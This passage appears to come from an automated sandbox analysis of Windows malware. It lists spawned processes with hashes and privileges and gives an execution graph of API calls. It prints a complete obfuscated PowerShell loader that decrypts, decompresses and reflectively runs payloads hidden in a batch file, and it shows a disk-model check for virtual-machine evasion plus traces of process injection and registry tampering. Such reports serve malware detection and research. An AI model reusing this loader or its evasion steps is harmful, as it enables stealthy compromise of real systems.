                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:14
                                                        Start time:07:40:10
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\dwm.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"dwm.exe"
                                                        Imagebase:0x7ff74e710000
                                                        File size:94'720 bytes
                                                        MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:15
                                                        Start time:07:40:12
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
                                                        Imagebase:0x7ff6a4070000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:16
                                                        Start time:07:40:12
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:17
                                                        Start time:07:40:12
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:wmic diskdrive get Model
                                                        Imagebase:0x7ff640220000
                                                        File size:576'000 bytes
                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:18
                                                        Start time:07:40:12
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\findstr.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
                                                        Imagebase:0x7ff6903c0000
                                                        File size:36'352 bytes
                                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:20
                                                        Start time:07:40:16
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:21
                                                        Start time:07:40:16
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:22
                                                        Start time:07:40:16
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:23
                                                        Start time:07:40:16
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:24
                                                        Start time:07:40:17
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:25
                                                        Start time:07:40:19
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:26
                                                        Start time:07:40:19
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:27
                                                        Start time:07:40:20
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd.exe /c echo function aQLUy($yReKm){ $FiuGL=[System.Security.Cryptography.Aes]::Create(); $FiuGL.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FiuGL.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FiuGL.Key=[System.Convert]::FromBase64String('Yeb/NAcCgrTp64tTdeVgDdugi9XnGFjFK2NDoLygP24='); $FiuGL.IV=[System.Convert]::FromBase64String('lhLiL9MPOAHIRlkYn9z7VA=='); $exYAh=$FiuGL.CreateDecryptor(); $YgVOo=$exYAh.TransformFinalBlock($yReKm, 0, $yReKm.Length); $exYAh.Dispose(); $FiuGL.Dispose(); $YgVOo;}function mFHoz($yReKm){ Invoke-Expression '$HdeTZ=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$yReKm);'.Replace('*', ''); Invoke-Expression '$wKYjD=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$odkuT=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($HdeTZ, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $odkuT.CopyTo($wKYjD); $odkuT.Dispose(); $HdeTZ.Dispose(); $wKYjD.Dispose(); $wKYjD.ToArray();}function tnqry($yReKm,$VDCUY){ Invoke-Expression '$KyIng=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$yReKm);'.Replace('*', ''); Invoke-Expression '$TcvQt=$KyIng.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$TcvQt.*I*n*v*o*k*e*($null, $VDCUY);'.Replace('*', '');}$yFDGP = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $yFDGP;$blPNL=[System.IO.File]::ReadAllText($yFDGP).Split([Environment]::NewLine);foreach ($nqZfK in $blPNL) { if ($nqZfK.StartsWith('tdfVh')) { $ZaBDo=$nqZfK.Substring(5); break; }}$ouiFf=[string[]]$ZaBDo.Split('\');Invoke-Expression '$pcr = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$aZk = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$fEm = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');tnqry $pcr $null;tnqry $aZk $null;tnqry $fEm (,[string[]] (''));
                                                        Imagebase:0x7ff6a4070000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:28
                                                        Start time:07:40:20
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell.exe -WindowStyle Hidden
                                                        Imagebase:0x7ff788560000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:29
                                                        Start time:07:40:22
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:30
                                                        Start time:07:40:22
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:31
                                                        Start time:07:40:22
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:32
                                                        Start time:07:40:23
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:33
                                                        Start time:07:40:23
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:34
                                                        Start time:07:40:23
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:35
                                                        Start time:07:40:24
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:36
                                                        Start time:07:40:24
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:37
                                                        Start time:07:40:24
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:38
                                                        Start time:07:40:24
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:39
                                                        Start time:07:40:25
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:40
                                                        Start time:07:40:26
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:41
                                                        Start time:07:40:26
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:42
                                                        Start time:07:40:27
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:43
                                                        Start time:07:40:27
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:44
                                                        Start time:07:40:27
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\dllhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\dllhost.exe /Processid:{5004adc4-d516-4ec2-8626-9598e9dad3bc}
                                                        Imagebase:0x7ff70f330000
                                                        File size:21'312 bytes
                                                        MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:45
                                                        Start time:07:40:28
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:46
                                                        Start time:07:40:28
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\spoolsv.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\spoolsv.exe
                                                        Imagebase:0x7ff646ff0000
                                                        File size:842'752 bytes
                                                        MD5 hash:0D4B1E3E4488E9BDC035F23E1F4FE22F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:47
                                                        Start time:07:40:28
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
                                                        Imagebase:0x7ff70f330000
                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:48
                                                        Start time:07:40:28
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:49
                                                        Start time:07:40:30
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:50
                                                        Start time:07:40:32
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:51
                                                        Start time:07:40:33
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\$nya-onimai2\IfMUlU.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\$nya-onimai2\IfMUlU.exe"
                                                        Imagebase:0x246b5010000
                                                        File size:36'864 bytes
                                                        MD5 hash:B943A57BDF1BBD9C33AB0D33FF885983
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 5%, ReversingLabs
                                                        Has exited:false

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:44.2%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:72.9%
                                                          Total number of Nodes:251
                                                          Total number of Limit Nodes:30
                                                          execution_graph 527 1400036f4 528 140003701 527->528 530 140003721 ConnectNamedPipe 528->530 531 140003716 Sleep 528->531 537 140002300 AllocateAndInitializeSid 528->537 532 14000377f Sleep 530->532 533 140003730 ReadFile 530->533 531->528 535 14000378a DisconnectNamedPipe 532->535 534 140003753 WriteFile 533->534 533->535 534->535 535->530 538 14000241b 537->538 539 14000235d SetEntriesInAclW 537->539 538->528 539->538 540 1400023a1 LocalAlloc 539->540 540->538 541 1400023b5 InitializeSecurityDescriptor 540->541 541->538 542 1400023c5 SetSecurityDescriptorDacl 541->542 542->538 543 1400023dc CreateNamedPipeW 542->543 543->538 544 140003634 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 545 14000368a K32EnumProcesses 544->545 546 1400036e7 Sleep 545->546 547 14000369f 545->547 546->545 548 1400036d8 547->548 550 140003190 547->550 548->546 551 1400031a1 550->551 552 1400031c9 550->552 556 140001868 OpenProcess 551->556 552->547 555 140001868 31 API calls 555->552 557 140001cd1 556->557 558 1400018b0 IsWow64Process 556->558 557->555 559 1400018c7 CloseHandle 558->559 559->557 561 1400018ed 559->561 561->557 562 14000192f OpenProcess 561->562 562->557 563 14000194b OpenProcess 562->563 564 140001a04 NtQueryInformationProcess 563->564 565 14000196a K32GetModuleFileNameExW 563->565 566 140001cc8 CloseHandle 564->566 567 140001a29 564->567 568 1400019b3 CloseHandle 565->568 569 140001983 PathFindFileNameW lstrlenW 565->569 566->557 567->566 571 140001a33 OpenProcessToken 567->571 568->564 570 1400019c1 568->570 569->568 572 1400019a0 StrCpyW 569->572 570->564 573 1400019e0 StrCmpIW 570->573 571->566 574 140001a51 GetTokenInformation 571->574 572->568 573->566 573->570 575 140001af4 574->575 576 140001a79 GetLastError 574->576 578 140001afb CloseHandle 575->578 576->575 577 140001a84 LocalAlloc 576->577 577->575 579 140001a9a GetTokenInformation 577->579 578->566 583 140001b0f 578->583 580 140001ae2 579->580 581 140001ac2 GetSidSubAuthorityCount GetSidSubAuthority 579->581 582 140001ae9 LocalFree 580->582 581->582 582->578 583->566 584 140001b9f StrStrA 583->584 585 140001bc8 583->585 584->583 586 140001bcd 584->586 585->566 586->566 587 140001bf8 VirtualAllocEx 586->587 587->566 588 140001c27 WriteProcessMemory 587->588 588->566 589 140001c46 588->589 597 140002bfc 589->597 591 140001c66 591->566 592 140001c74 WaitForSingleObject 591->592 593 140001c83 GetExitCodeThread 592->593 594 140001cbd CloseHandle 592->594 595 140001ca2 VirtualFreeEx 593->595 596 140001c99 593->596 594->566 595->594 596->595 600 1400020cc GetModuleHandleA 597->600 601 1400020f5 600->601 602 1400020ec GetProcAddress 600->602 602->601 603 140002d38 606 140002d4c 603->606 651 140002a0c 606->651 609 140002a0c 14 API calls 610 140002d74 GetCurrentProcessId OpenProcess 609->610 611 140002d94 OpenProcessToken 610->611 612 140002e06 RegOpenKeyExW 610->612 613 140002da8 LookupPrivilegeValueW 611->613 614 140002dfd CloseHandle 611->614 615 140002e37 RegQueryValueExW 612->615 616 140002d41 ExitProcess 612->616 613->614 617 140002dbf AdjustTokenPrivileges 613->617 614->612 615->616 618 140002e67 RegQueryValueExW 615->618 617->614 619 140002df7 GetLastError 617->619 618->616 620 140002e97 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc RegQueryValueExW 618->620 619->614 620->616 621 140002f09 RegQueryValueExW 620->621 621->616 622 140002f39 RegCloseKey GetCurrentProcessId 621->622 665 14000200c GetProcessHeap HeapAlloc 622->665 624 140002f50 RegCreateKeyExW 625 14000304a CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 624->625 626 140002f8d ConvertStringSecurityDescriptorToSecurityDescriptorW 624->626 627 14000151c 50 API calls 625->627 628 140002fb5 RegSetKeySecurity LocalFree 626->628 629 140002fcf RegCreateKeyExW 626->629 632 1400030d4 627->632 628->629 630 140003009 GetCurrentProcessId RegSetValueExW RegCloseKey 629->630 631 140003040 RegCloseKey 629->631 630->631 631->625 633 140003112 632->633 634 1400030e0 ShellExecuteW 632->634 635 14000148c 6 API calls 633->635 634->633 634->634 636 14000311a 635->636 637 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 636->637 638 140003123 637->638 639 14000148c 6 API calls 638->639 640 14000312c 639->640 641 14000148c 6 API calls 640->641 642 140003135 641->642 643 14000148c 6 API calls 642->643 644 14000313e 643->644 645 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 644->645 646 140003147 645->646 647 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 646->647 648 140003150 647->648 649 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 648->649 650 140003159 GetProcessHeap HeapFree SleepEx 649->650 650->616 652 140002a15 StrCpyW StrCatW GetModuleHandleW 651->652 653 140002bdf 651->653 652->653 654 140002a66 GetCurrentProcess K32GetModuleInformation 652->654 653->609 655 140002bd6 FreeLibrary 654->655 656 140002a96 CreateFileW 654->656 655->653 656->655 657 140002acb CreateFileMappingW 656->657 658 140002af4 MapViewOfFile 657->658 659 140002bcd CloseHandle 657->659 660 140002bc4 CloseHandle 658->660 661 140002b17 658->661 659->655 660->659 661->660 662 140002b30 lstrcmpiA 661->662 664 140002b6e 661->664 662->661 663 140002b70 VirtualProtect VirtualProtect 662->663 663->660 664->660 671 140001cf0 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 665->671 667 1400020a5 GetProcessHeap HeapFree 668 140002050 668->667 669 140002071 OpenProcess 668->669 669->668 670 140002087 TerminateProcess CloseHandle 669->670 670->668 672 140001e58 GetProcessHeap HeapFree GetProcessHeap RtlFreeHeap 671->672 676 140001d7d 671->676 672->668 673 140001d92 OpenProcess 674 140001daf K32EnumProcessModulesEx 673->674 673->676 675 140001e43 CloseHandle 674->675 674->676 675->676 676->672 676->673 676->675 677 140001de9 ReadProcessMemory 676->677 678 140001e0b 677->678 678->675 678->676 678->677 679 140002cb0 681 140002cbd 679->681 680 140002300 6 API calls 680->681 681->680 682 140002cd2 Sleep 681->682 683 140002cdd ConnectNamedPipe 681->683 682->681 684 140002d21 Sleep 683->684 685 140002cec ReadFile 683->685 686 140002d2c DisconnectNamedPipe 684->686 685->686 687 140002d0f 685->687 686->683 687->686 689 1400031d0 687->689 690 140003413 689->690 691 1400031f7 689->691 692 140003619 690->692 693 14000341f 690->693 694 140003355 ReadFile 691->694 695 1400031fd 691->695 700 140001f7c 22 API calls 692->700 696 1400035c9 693->696 697 14000342b 693->697 698 140003330 694->698 699 14000337f 694->699 701 140003209 695->701 702 14000334c ExitProcess 695->702 703 1400020fc ReadFile 696->703 704 140003434 697->704 705 140003515 697->705 698->687 699->698 706 14000338c GetProcessHeap HeapAlloc 699->706 700->698 701->698 712 1400032c2 ReadFile 701->712 713 140003227 701->713 707 1400035d8 703->707 708 1400034e4 704->708 709 140003440 704->709 777 1400020fc 705->777 710 140001cf0 13 API calls 706->710 707->698 719 1400020fc ReadFile 707->719 774 140002c5c 708->774 709->698 715 14000344c RegOpenKeyExW 709->715 732 1400033c5 710->732 712->698 723 1400032ec 712->723 713->698 717 140003230 GetProcessHeap HeapAlloc K32EnumProcesses 713->717 720 1400034b5 715->720 721 140003479 RegDeleteValueW RegDeleteValueW RegDeleteValueW 715->721 717->698 740 